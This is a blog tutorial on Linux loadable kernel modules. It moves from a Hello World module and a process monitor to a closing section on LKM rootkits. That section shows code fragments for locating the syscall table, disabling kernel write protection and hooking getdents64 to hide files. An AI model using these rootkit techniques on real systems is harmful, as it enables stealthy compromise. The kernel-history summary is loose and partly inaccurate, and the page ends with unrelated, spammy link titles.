LKM Addict, learning the basics of lkm

Bruno Ciccarino λ - Oct 8 - - Dev Community

Hey folks! Today, I’m going to walk you through LKMs (Loadable Kernel Modules)—from a simple "Hello World" module all the way to creating an LKM rootkit. If you find this helpful, feel free to share it, and thanks in advance to everyone who reads till the end. You'll find all the code and references linked at the bottom of the post, so be sure to check out the sources. Trust me, digging into those and modifying the code will really help you learn more. Heads-up though—some of the code is under the GPL 3 license, so make sure you’re aware of the terms.

What You’ll Need:

linux-headers-generic
A C compiler (I recommend GCC or cc)

Table of Contents:

  • 1) What is LKM and how it works
  • 2) Example LKM Makefile
  • 3) How modules get loaded into the kernel
  • 4) LKM "Hello World"
  • 5) Key changes over the years
  • 6) Syscall table changes in Kernel 5.7
  • 7) LKM for process monitoring
  • 8) Building an LKM rootkit

1) What is LKM and how it works:

LKMs are Loadable Kernel Modules that help the Linux kernel extend its functionality—like adding drivers for hardware without needing to recompile the entire kernel. They’re perfect for device drivers (like sound cards), file systems, etc. Every LKM at the very least needs these two basic functions:

static int __init module_init(void)
{
    return 0;
}

static void __exit module_exit(void)
{
}
Enter fullscreen mode Exit fullscreen mode

2) Example LKM Makefile:

Here’s a super simple Makefile for compiling your module:

obj-m := example.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

all:
 $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
 $(MAKE) -C $(KDIR) M=$(PWD) clean
Enter fullscreen mode Exit fullscreen mode

3) How Modules Get Loaded into the Kernel:

You can see the modules loaded into the kernel with the lsmod command. It checks the info in /proc/modules. Modules usually identify the kernel through aliases like this:

alias char-major-10–30 softdog

This tells modprobe that the softdog.o module should be loaded, and it checks /lib/modules/version/modules.dep for dependencies created by running depmod -a.

4) LKM "Hello World":

Here’s how to make a super basic "Hello World" module:

#include <linux/module.h> 
#include <linux/kernel.h> 
#include <linux/init.h>   

static int __init hello_init(void)
{
    printk(KERN_INFO "<1>Hello World\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO"<1> Bye bye!");
}

module_init(hello_init);
module_exit(hello_exit);

MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");
Enter fullscreen mode Exit fullscreen mode

5) Key Changes in LKM over the Years:

There have been some pretty significant changes in LKMs over time, so let’s break them down by Linux kernel version:

Kernel 2.x (up to 2.6):

Initial support for dynamic LKM loading and unloading.
Better debugging tools (OOPS, PANIC).
Kernel 2.6.x:

Introduction of udev for better device management.
Preemptive kernel for quicker response times.
Native Posix Thread Library (NPTL) improves handling of multithreaded processes.
Kernel 3.x:

Support for namespaces, improving container tech like Docker.
Filesystem and GPU driver improvements.
Kernel 4.x:

Kernel security gets a boost with KASLR.
Better container support (Cgroups, namespaces).
New hardware support.
Kernel 5.x:

Better filesystem encryption and live patching.
Expansion of BPF beyond just networks.
Better RISC-V and ARM support.
Kernel 5.7:

Major change: the syscall table (sys_call_table) became less accessible for security reasons. Modules that needed to modify the syscall table had to adapt.
Kernel 6.x:

Rust language support for safer kernel module development.
Security and isolation improvements, with a focus on energy efficiency for mobile devices.

6) Changes in the Syscall Table in Kernel 5.7:

In Linux 5.7, changes were made to protect the syscall table. It’s now write-protected and not easily accessible, which is a big win for security but complicated things for legitimate modules that rely on it. If you were using kprobes.h to find the sys_call_table, you’d need a new strategy. Now, you can’t modify it directly due to protections like Write-Protection (WP).

7) LKM for Process Monitoring:

This is a module that monitors processes in the kernel by periodically running checks (e.g., every 2 seconds) using a timer. It watches for things like process creation and termination, file access, and network usage.

Here’s a bit of code to get you started with that:

#include <linux/module.h>
#include <linux/sched.h>
#include <linux/timer.h>
#include <linux/cred.h>

static struct timer_list procmonitor_timer;

static void procmonitor_check_proc_tree(unsigned long unused)
{
    struct task_struct *task;
    for_each_process(task)
        printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);

    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(2000));
}

static int __init procmonitor_init(void)
{
    setup_timer(&procmonitor_timer, procmonitor_check_proc_tree, 0);
    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
    return 0;
}

static void __exit procmonitor_exit(void)
{
    del_timer_sync(&procmonitor_timer);
}

module_init(procmonitor_init);
module_exit(procmonitor_exit);
Enter fullscreen mode Exit fullscreen mode

8) LKM Rootkits:

Rootkits are basically malicious modules that hijack system calls to hide malware. Here’s how they hook into the syscall table and modify behavior.

First, you need to locate the syscall table:

unsigned long *find_syscall_table(void)
{
    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
    kallsyms_lookup_name_t kallsyms_lookup_name;
    register_kprobe(&kp);
    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
    unregister_kprobe(&kp);
    return (unsigned long*)kallsyms_lookup_name("sys_call_table");
}
Enter fullscreen mode Exit fullscreen mode

Then, you can unprotect the memory where the syscall table is:

static inline void unprotect_memory(void)
{
    write_cr0_forced(cr0 & ~0x00010000);
}
Enter fullscreen mode Exit fullscreen mode

After that, replace the original function with your hook:

static int __init ghost_init(void)
{
    __syscall_table = find_syscall_table();
    if (!__syscall_table) return -1;

    cr0 = read_cr0();
    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];
    unprotect_memory();
    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;
    protect_memory();
    return 0;
}
Enter fullscreen mode Exit fullscreen mode

The hook function intercepts and hides files:

asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
    int ret = orig_getdents64(fd, dirp, count);
    // Intercept the syscall here...
    return ret;
}
Enter fullscreen mode Exit fullscreen mode

Image description

Credits

The Hackers Choice
elinux
kernel br
xcellerator
lkmpg
cat enjoyer
My rootkit
diamorphine

Image
Responsive macOS Style Portfolio

codepen
Image
Essential Programming Symbols and Their German Equivalents

javascript, java, coding, developers
Image
Who am I
Image
Top 5 Libraries to Boost Performance in React Applications
Image
LITE MANAGER
Image
AI for Developers
Image
What are Design Sytems? Definition and Types

design, designsystem, uidesign
Image
Senior Software Engineer - backend for a mission driven, fully funded startup

jobs
Image
Effective PRs, Code Reviews, and Issue Fixes

typescript, opensource, github, webdev
Image
Power BI Quick Measures: Simplify Your Data Calculations
Image
# Exploring the Risks of RFID WiFi Tags: Copying and Emulating with a Flipper zero

cybersecurity, infosec, wifi, testing
Image
How to Change Text Color in CSS: Everything You Wanted to Know 🎨

webdev, beginners, programming, css
Image
DocBot: Your README Generator
Image
Easy Home Improvement Tips: Ceiling Fans
Image
Data Analysis Dashboard

codepen
Image
Top 3 features in Postgres 17

database, postgres, postgressql, webdev
Image
Podman - A Simple, Lightweight Docker Alternative

docker, webdev, beginners, programming
Image
cash app: your favourite money transfer app so you fast and get now csah app $750

csharp, webdev, webmonetization, interview
Image
Toontrack – Decades SDX Download

vst, software
.
Terabox Video Player